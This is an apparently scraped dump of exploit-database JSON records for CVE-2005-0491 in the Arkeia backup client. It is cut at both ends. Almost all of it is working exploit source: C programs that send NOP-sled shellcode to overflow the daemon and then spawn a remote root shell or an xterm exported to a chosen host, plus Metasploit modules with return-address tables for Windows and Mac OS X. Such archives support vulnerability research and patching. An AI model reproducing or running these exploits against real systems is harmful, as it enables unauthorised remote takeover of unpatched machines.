0;\r\n\r\n\tretaddr = targets[tnum].targret;\r\n\tsafe = targets[tnum].targsafe;\r\n\tdatalen = targets[tnum].len;\r\n\r\n\t\r\n\tsock_nops = isock(host, port);\r\n\r\n\tif (sock_nops < 1)\r\n\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d NOP+shellcode socket\\n\", host, port);\r\n\r\n\tsock_overflow = isock(host, port);\r\n\tif (sock_overflow < 1)\r\n\t\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d overflow socket\\n\", host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, NOP, DATA_LEN);\r\n\r\n\t// copy in return address\r\n\tmemcpy(data+datalen - 8, (char *)&retaddr, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-4, (char *)&safe, 4); \r\n\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, NOP, NOP_LEN+1);\r\n\tsc = (char *)malloc(strlen(shellcode) + strlen(export) + 2);\r\n\tsprintf(sc, \"%s%s%s\", shellcode, export, \"K\");\r\n\tif (strlen(sc) + NOP_LEN > NOP_LEN*2-1) \r\n\t{\r\n\t\tfprintf(stderr, \"[!] display name too long\\n\");\r\n\t\texit(-1);\r\n\t}\r\n\r\n\tmemcpy(sc_req+NOP_LEN, sc, strlen(sc));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+strlen(sc)+1); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow, pointing EIP to above nops+sc\r\n\twrite(sock_overflow, head, HEAD_LEN);\t// 8 byte header\r\n\tdatalen = ntohs(datalen);\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, data, datalen);\t// small overflow packet\r\n\tfprintf(stderr, \"[*] Done, check for xterm\\n\");\r\n\tclose(sock_overflow);\r\n\r\n}\r\n\r\nvoid windows (char *host, int tnum, int offset)\r\n{\r\n\tchar \t\thead[] \t\t= \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[DATA_LEN];\r\n\tchar\t\tsc_req[NOP_LEN*2];\r\n\tchar\t\t*sc;\r\n\tchar\t\t*export;\r\n\tunsigned int\tret;\r\n\tunsigned int\tsafeaddr;\r\n\tint\t\toverflow_len;\r\n\tint\t\tdatasiz\t\t= DATA_LEN;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\r\n\tdatalen = targets[tnum].len;\r\n\tret = targets[tnum].targret + offset;\r\n\tsock_overflow = isock(host, port);\r\n\tif (sock_overflow < 1)\r\n\t\t\texit(-1);\r\n\tfprintf(stderr, \"[*] Connected to %s:%d overflow socket\\n\", host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, NOP, DATA_LEN);\r\n\tmemcpy(data+datalen - 4, (char *)&ret, 4);\r\n\tmemcpy(data+DATA_LEN-strlen(shellcode_win)-1, shellcode_win, strlen(shellcode_win));\r\n\t\r\n\t// put size into header\r\n\tdatasiz = ntohs(datasiz);\r\n\tmemcpy(head+6, (char *)&datasiz, 2);\r\n\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\t\t// 8 byte header\r\n\twrite(sock_overflow, data, DATA_LEN);\t\t// large data section\r\n\tclose(sock_overflow);\r\n\r\n\tfor (i = 0; i < 20; i++)\r\n\t{\r\n\t\tsleep(1);\t\r\n\t\tfprintf(stderr, \"[*] Attempting to get remote shell, try #%d\\n\", i);\r\n\t\t// connect to shell\r\n\t\tsock_shell = isock(host, SHELL_PORT);\r\n\t\tif (sock_shell > 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\t\t\tgetshell(sock_shell);\r\n\t\t}\r\n\t}\r\n\r\n\tfprintf(stderr, \"[!] Exploit failed or cannot connect to port 80\\n\");\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 77 request */\r\n\t/* last two bytes length */\r\n\tchar\t\t*host;\r\n\tchar\t\t*export;\r\n\tunsigned int\ttnum;\r\n\tint\t\tdatalen\t\t= 0;\r\n\tint\t\toffset\t\t= 0;\r\n\r\n\t\r\n\tif (argc == 4)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\r\n\t\tif (targets[tnum].targtype == LINUX)\r\n\t\t\texport = argv[3];\r\n\t\telse\r\n\t\t\toffset=atoi(argv[3]);\r\n\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\r\n\tfprintf(stderr, \"[*] Knox Arkeia <= v5.3.x remote root/SYSTEM exploit\\n\");\r\n\tfprintf(stderr, \"[*] Attacking %s system\\n\", targets[tnum].os);\r\n\r\n\tif (targets[tnum].targtype == LINUX )\r\n\t{\r\n\t\tfprintf(stderr, \"[*] Exporting xterm to %s\\n\", export);\r\n\t\tlin(host, export, tnum);\r\n\t}\r\n\telse if (targets[tnum].targtype == WINDOWS)\r\n\t{\r\n\t\tfprintf(stderr, \"[*] Spawning shell on %s:%d\\n\", host, SHELL_PORT);\r\n\t\twindows(host, tnum, offset);\r\n\t}\r\n\telse\r\n\t{\r\n\t\tfprintf(stderr, \"[!] Unknown target type: %d\\n\", targets[tnum].targtype);\r\n\t\texit(-1);\r\n\t}\r\n\r\n}\r\n\r\n// milw0rm.com [2005-02-18]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/828/"}, {"lastseen": "2016-01-31T11:43:05", "description": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit. CVE-2005-0491. Remote exploit for linux platform", "published": "2003-09-20T00:00:00", "type": "exploitdb", "title": "Knox Arkeia Pro 5.1.12 Backup Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2003-09-20T00:00:00", "id": "EDB-ID:102", "href": "https://www.exploit-db.com/exploits/102/", "sourceData": "/*\r\n * Knox Arkiea arkiead local/remote root exploit.\r\n *\r\n * Portbind 5074 shellcode\r\n *\r\n * Tested on Redhat 8.0, Redhat 7.2, but all versions are presumed vulnerable.\r\n * \r\n * NULLs out least significant byte of EBP to pull EIP out of overflow buffer.\r\n * A previous request forces a large allocation of NOP's + shellcode in heap\r\n * memory. Find additional targets by searching the heap for NOP's after a \r\n * crash. safeaddr must point to any area of memory that is read/writable\r\n * and won't mess with program/shellcode flow. \r\n *\r\n * ./ark_sink host targetnum \r\n * [user@host dir]$ ./ark_sink 192.168.1.2 1\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Connected to 192.168.1.2:617\r\n * [*] Sending nops+shellcode\r\n * [*] Done, sleeping\r\n * [*] Sending overflow\r\n * [*] Done\r\n * [*] Sleeping and connecting remote shell\r\n * [*] Connected to 192.168.1.2:5074\r\n * [*] Success, enjoy\r\n * id\r\n * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n *\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/errno.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n\r\n\r\n#define BUFLEN\t\t10000\t\t/* for getshell() \t\t*/\r\n#define LEN \t\t280\t\t/* overflow packet data section */\r\n#define HEAD_LEN \t8\t\t /* overflow packet header\t*/\r\n#define NOP_LEN\t\t10000\t\t/* nop+shellcode packet \t*/\r\n#define ARK_PORT\t617\r\n#define SHELL_PORT\t5074\r\n#define NOP \t\t0x90\r\n#define NUMTARGS\t2\r\n\r\nstruct {\r\n\tchar \t\t*os;\r\n\tunsigned int\ttargret;\r\n\tunsigned int\ttargsafe;\r\n} targets[] = {\r\n\t{ \"Redhat 8.0\", 0x80ecf90, 0x080eb940 },\r\n\t{ \"Redhat 7.2\", 0x80eddc0, 0x080eb940 },\r\n\tNULL\r\n};\r\n\r\n\r\n/* portbind 5074 */\r\nconst char shellcode[] = \r\n\"\\x89\\xc3\\xb0\\x02\\xcd\\x80\\x38\\xc3\\x74\\x05\\x8d\\x43\\x01\\xcd\\x80\"\r\n\"\\x31\\xc0\\x89\\x45\\x10\\x40\\x89\\xc3\\x89\\x45\\x0c\\x40\\x89\\x45\\x08\"\r\n\"\\x8d\\x4d\\x08\\xb0\\x66\\xcd\\x80\\x89\\x45\\x08\\x43\\x66\\x89\\x5d\\x14\"\r\n\"\\x66\\xc7\\x45\\x16\\x13\\xd2\\x31\\xd2\\x89\\x55\\x18\\x8d\\x55\\x14\"\r\n\"\\x89\\x55\\x0c\\xc6\\x45\\x10\\x10\\xb0\\x66\\xcd\\x80\\x40\\x89\\x45\\x0c\"\r\n\"\\x43\\x43\\xb0\\x66\\xcd\\x80\\x43\\x89\\x45\\x0c\\x89\\x45\\x10\\xb0\\x66\"\r\n\"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\"\r\n\"\\x75\\xf6\\x31\\xd2\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\"\r\n\"\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";\r\n\r\nunsigned int resolve(char *hostname)\r\n{\r\n\tu_long \tip = 0;\r\n\tstruct hostent\t*hoste;\r\n\r\n\tif ((int)(ip = inet_addr(hostname)) == -1)\r\n\t{\r\n\t\tif ((hoste = gethostbyname(hostname)) == NULL)\r\n\t\t{\r\n\t\t\therror(\"[!] gethostbyname\");\r\n\t\t\texit(-1);\r\n\t\t}\r\n\t\tmemcpy(&ip, hoste->h_addr, hoste->h_length);\r\n\t}\r\n\treturn(ip);\r\n}\r\n\r\n\r\nint isock(char *hostname, int portnum)\r\n{\r\n\tstruct sockaddr_in\tsock_a;\r\n\tint\t\t\tnum, sock;\r\n\tunsigned int\t\tip;\r\n\tfd_set\t\t\tinput;\r\n\r\n\tsock_a.sin_family = AF_INET;\r\n\tsock_a.sin_port = htons(portnum);\r\n\tsock_a.sin_addr.s_addr = resolve(hostname);\r\n\r\n\tif ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)\r\n\t{\r\n\t\therror(\"[!] accept\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tif (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)))\r\n\t{\r\n\t\therror(\"[!] connect\");\r\n\t\texit(-1);\r\n\t}\r\n\t\r\n\tfprintf(stderr, \"[*] Connected to %s:%d\\n\", hostname, portnum);\r\n\treturn(sock);\r\n\t\r\n}\r\n\r\nint getshell(int sock)\r\n{\r\n\r\n\tchar\tbuf[BUFLEN];\r\n\tint\tnread=0;\r\n\r\n \twhile(1) \r\n\t{ \r\n \t\tfd_set input; \r\n \t\tFD_SET(0,&input); \r\n \t\tFD_SET(sock,&input); \r\n \t\tselect(sock+1,&input,NULL,NULL,NULL); \r\n \t\r\n\t\tif(FD_ISSET(sock,&input)) \r\n\t\t{ \r\n \t\t\tnread=read(sock,buf,BUFLEN); \r\n \t\t\twrite(1,buf,nread); \r\n \t\t} \r\n \t\tif(FD_ISSET(0,&input)) \r\n \t\t\twrite(sock,buf,read(0,buf,BUFLEN)); \r\n \t} \r\n}\r\n\r\nint usage(char *progname)\r\n{\r\n\tint \ti;\r\n\r\n\tfprintf(stderr, \"Usage:\\n./%s hostname target_num\\n\");\r\n\tfor (i = 0; targets[i].os; i++)\r\n\t\tfprintf(stderr, \"Target %d: %s\\n\", i+1, targets[i].os);\r\n\texit(-1);\r\n}\r\n\r\nint main( int argc, char **argv)\r\n{\r\n\r\n\t/* first 2 bytes are a type 74 request */\r\n\t/* last two bytes length */\r\n\tchar \t\thead[] = \"\\x00\\x4a\\x00\\x03\\x00\\x01\\xff\\xff\";\r\n\tchar \t\tdata[512];\r\n\tchar\t\tsc_req[20000];\r\n\tchar\t\t*host;\r\n\tunsigned int\t\ttnum;\r\n\tunsigned int \tsafeaddr;\r\n\tunsigned int \tret;\r\n\tint\t\tdatalen\t\t= LEN;\r\n\tint\t\tport\t\t= ARK_PORT;\r\n\tunsigned int\taddr\t\t= 0;\r\n\tint\t\tsock_overflow, sock_nops, sock_shell;\r\n\tint \t\ti;\r\n\r\n\tif (argc == 3)\r\n\t{\r\n\t\thost = argv[1];\r\n\t\ttnum = atoi(argv[2]);\r\n\t\tif (tnum > NUMTARGS || tnum == 0)\r\n\t\t{\r\n\t\t\tfprintf(stderr, \"[!] Invalid target\\n\");\r\n\t\t\tusage(argv[0]);\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\r\n\t\tusage(argv[0]);\r\n\t}\r\n\t\r\n\ttnum--;\r\n\tret = targets[tnum].targret;\r\n\tsafeaddr = targets[tnum].targsafe;\r\n\r\n\tsock_overflow = sock_nops = sock_shell = 0;\r\n\tsock_nops = isock(host, port);\r\n\tsock_overflow = isock(host, port);\r\n\r\n\t// build data section of overflow packet\r\n\tmemset(data, 0x90, datalen);\r\n\tfor (i = 0; i < datalen; i += 4)\r\n\t\tmemcpy(data+i, (char *)&ret, 4);\r\n\t// we overwrite a pointer that must be a valid address\r\n\tmemcpy(data+datalen-12, (char *)&safeaddr, 4); \r\n\r\n\t// build header of overflow packet\r\n\tdatalen = ntohs(datalen);\r\n\tmemcpy(head+6, (char *)&datalen, 2);\r\n\r\n\t// build invalid packet with nops+shellcode\r\n\tmemset(sc_req, 0x90, NOP_LEN+1);\r\n\tmemcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode));\r\n\r\n\t// send invalid nop+shellcode packet\r\n\tfprintf(stderr, \"[*] Sending nops+shellcode\\n\");\r\n\twrite(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); \r\n\tfprintf(stderr, \"[*] Done, sleeping\\n\");\r\n\tsleep(1);\r\n\tclose(sock_nops);\r\n\r\n\t// send overflow\r\n\tfprintf(stderr, \"[*] Sending overflow\\n\");\r\n\twrite(sock_overflow, head, HEAD_LEN);\r\n\twrite(sock_overflow, data, LEN);\r\n\tfprintf(stderr, \"[*] Done\\n\");\r\n\tfprintf(stderr, \"[*] Sleeping and connecting remote shell\\n\");\r\n\tsleep (1);\r\n\tclose(sock_overflow);\r\n\r\n\t// connect to shell\r\n\tsock_shell = isock(host, SHELL_PORT);\r\n\tfprintf(stderr, \"[*] Success, enjoy\\n\");\r\n\tgetshell(sock_shell);\r\n\r\n}\r\n\n\n// milw0rm.com [2003-09-20]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/102/"}, {"lastseen": "2016-02-01T23:55:53", "description": "Arkeia Backup Client Type 77 Overflow (Win32). CVE-2005-0491. Remote exploit for win32 platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client Type 77 - Overflow Win32", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16466", "href": "https://www.exploit-db.com/exploits/16466/", "sourceData": "##\r\n# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Arkeia\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\r\n\t\t\t\tclient for the Windows platform. This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491' ],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe\r\n\t\t\t\t\t['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll\r\n\t\t\t\t\t['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\r\n\t\t}\r\n\r\n\t\tif (info['System'] !~ /Windows/)\r\n\t\t\tprint_status(\"This module only supports Windows targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\tdata = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()\r\n\t\thead[6, 2] = [data.length].pack('n')\r\n\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(data)\r\n\t\t\tsock.get_once\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\tdef prep_ark5\r\n\t\tdata = rand_text_english(4096, payload_badchars)\r\n\t\tdata[1176, 4] = [target['Rets'][0]].pack('V')\r\n\t\tdata[1172, 2] = \"\\xeb\\xf9\"\r\n\t\tdata[1167, 5] = \"\\xe98\" + [-1172].pack('V')\r\n\t\tdata[0, payload.encoded.length] = payload.encoded\r\n\tend\r\n\r\n\tdef prep_ark4\r\n\t\tdata = rand_text_english(4096, payload_badchars)\r\n\t\tseh = generate_seh_payload( target['Rets'][0] )\r\n\t\tdata[ 96, seh.length] = seh\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16466/"}, {"lastseen": "2016-02-01T11:33:09", "description": "Arkeia Backup Client. CVE-2005-0491. Remote exploit for osx platform", "published": "2005-02-18T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client <= 5.3.3 - Type 77 Overflow OS X", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2005-02-18T00:00:00", "id": "EDB-ID:9930", "href": "https://www.exploit-db.com/exploits/9930/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Arkeia\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack overflow in the Arkeia backup\r\n\t\t\t\tclient for the Mac OS X platform. This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3 and has been tested\r\n\t\t\t\twith Arkeia 5.3.1 on Mac OS X 10.3.5.\r\n\t\t\t\t\t\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491'],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 700,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ConnectionType' => '-find',\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Arkeia 5.3.1 Stack Return (boot)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff910,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\t\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\t\t\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\t\r\n\t\t}\r\n\t\t\r\n\t\tif (info['System'] !~ /Darwin/)\r\n\t\t\tprint_status(\"This module only supports Mac OS X targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\t\t\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\t\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\t\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\r\n\t\t# Request has to be big enough to find and small enough\r\n\t\t# not to write off the end of the stack. If we write too\r\n\t\t# far down, we also smash env[], which causes a crash in\r\n\t\t# getenv() before our function returns.\r\n\t\t\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\thead[6, 2] = [1200].pack('n')\r\n\t\t\r\n\t\tbuf = rand_text_english(1200, payload_badchars)\r\n\r\n\t\t# Return back to the stack either directly or via system lib\r\n\t\tbuf[0, 112] = [target.ret].pack('N') * (112/4)\r\n\r\n\t\t# Huge nop slep followed by the payload\r\n\t\tbuf[112, payload.encoded.length] = payload.encoded\r\n\t\t\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(buf)\r\n\t\t\tsock.get_once\t\t\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9930/"}, {"lastseen": "2016-02-02T06:41:53", "description": "Arkeia Backup Client Type 77 Overflow (Mac OS X). CVE-2005-0491. Remote exploit for osx platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "Arkeia Backup Client Type 77 - Overflow Mac OS X", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16865", "href": "https://www.exploit-db.com/exploits/16865/", "sourceData": "##\r\n# $Id: type77.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Arkeia\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the Arkeia backup\r\n\t\t\t\tclient for the Mac OS X platform. This vulnerability affects\r\n\t\t\t\tall versions up to and including 5.3.3 and has been tested\r\n\t\t\t\twith Arkeia 5.3.1 on Mac OS X 10.3.5.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-0491'],\r\n\t\t\t\t\t[ 'OSVDB', '14011'],\r\n\t\t\t\t\t[ 'BID', '12594'],\r\n\t\t\t\t\t[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'MinNops' => 700,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'ConnectionType' 